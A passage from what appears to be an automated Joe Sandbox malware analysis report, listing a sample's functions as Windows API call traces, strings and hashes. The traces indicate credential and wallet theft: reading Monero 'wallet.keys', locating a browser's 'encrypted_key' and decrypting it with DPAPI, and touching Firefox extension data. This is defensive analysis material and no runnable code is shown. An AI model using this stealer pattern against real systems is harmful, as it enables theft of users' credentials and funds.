                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FD1580,00FD0D92), ref: 00FBF54C
                  • lstrlen.KERNEL32(00000000), ref: 00FBF56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                  • Instruction ID: ccf0fbabeaa53f18e2c0c0134953871201edf12fee75785910061f7ad67edfbe
                  • Opcode Fuzzy Hash: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                  • Instruction Fuzzy Hash: 32511C71D0010DABDB04FBA0ED97EED7339AF54304F40852CE816661D1EE387A09EBA2
                  Function 00FC3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 39f3bdf59209a6d5bd01ddd9e6862b0a08cb8250903e8f8a2c8967ea8e50072a
                  • Instruction ID: 330f0f1b3559a7c4fcdd36fc2b1e7ee363f55b3edc82b6e1fd6252a01c4ae368
                  • Opcode Fuzzy Hash: 39f3bdf59209a6d5bd01ddd9e6862b0a08cb8250903e8f8a2c8967ea8e50072a
                  • Instruction Fuzzy Hash: 75413D71D1010AABCB04EFA4DA46FEEB775EF44704F14801CE41667280EB79AA05EFA2
                  Function 00FB9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                    • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                    • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                    • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                    • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                    • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                    • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                    • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                    • Part of subcall function 00FB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                    • Part of subcall function 00FB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                    • Part of subcall function 00FB9B60: LocalFree.KERNEL32(?), ref: 00FB9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 894e52a534e6c83e28f5d85f0dcbf932e2b49e9cbf2cdc1f5bbad39584d38715
                  • Instruction ID: a4ee0ddb2c4dca844732213f9a6c7d159e4aecbd63fad215f5af9e9b3d9381e8
                  • Opcode Fuzzy Hash: 894e52a534e6c83e28f5d85f0dcbf932e2b49e9cbf2cdc1f5bbad39584d38715
                  • Instruction Fuzzy Hash: E3317EB6D00209ABCF04DBE5DC86EEEB7B8BF48304F144519EA01A3241EB749A04DBA1
                  Function 00FC92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00FC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FC3AEE,?), ref: 00FC92FC
                  • GetFileSizeEx.KERNEL32(000000FF,00FC3AEE), ref: 00FC9319
                  • CloseHandle.KERNEL32(000000FF), ref: 00FC9327
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                  • Instruction ID: 434f8857262482add88784a44beb2b3318054ad78dc63fc63b7dfa9eb5fe76f3
                  • Opcode Fuzzy Hash: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                  • Instruction Fuzzy Hash: A8F0A435E04204BBDB24DFB0ED49F9E77F9AB48320F10C658B615A71C4D7B5A6419F40
                  Function 00FCC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 00FCC74E
                    • Part of subcall function 00FCBF9F: __amsg_exit.LIBCMT ref: 00FCBFAF
                  • __getptd.LIBCMT ref: 00FCC765
                  • __amsg_exit.LIBCMT ref: 00FCC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00FCC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                  • Instruction ID: e44d59ee04860fd7b8ef20eaa497dcf880ee81561addbb3592c7221c4490ee5d
                  • Opcode Fuzzy Hash: 189a001369ec40fbfb189ea411e583d18e8c2a311d9de4f0bd41e63b45e901ed
                  • Instruction Fuzzy Hash: F0F06D36D052079BDB21BFB85E07F5D37A0AF00724F25414DF418A62D2DB685940FE96
                  Function 00FC4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4F7A
                  • lstrcat.KERNEL32(?,00FD1070), ref: 00FC4F97
                  • lstrcat.KERNEL32(?,00C89258), ref: 00FC4FAB
                  • lstrcat.KERNEL32(?,00FD1074), ref: 00FC4FBD
                    • Part of subcall function 00FC4910: wsprintfA.USER32 ref: 00FC492C
                    • Part of subcall function 00FC4910: FindFirstFileA.KERNEL32(?,?), ref: 00FC4943
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FDC), ref: 00FC4971
                    • Part of subcall function 00FC4910: StrCmpCA.SHLWAPI(?,00FD0FE0), ref: 00FC4987
                    • Part of subcall function 00FC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00FC4B7D
                    • Part of subcall function 00FC4910: FindClose.KERNEL32(000000FF), ref: 00FC4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                  • Instruction ID: a01b349b13e2008086b99d12f77d1b03e12d7afa07ba86e3118ab4a7ac174515
                  • Opcode Fuzzy Hash: 2d375f0c279aaf0fa5be937e5b92d281f7019e298bb4b00aa7eb6874566c908a
                  • Instruction Fuzzy Hash: C521A47690020867C768FBA0EC46FE9333CAB54700F00455CB65D97185EEBCAAC99BA2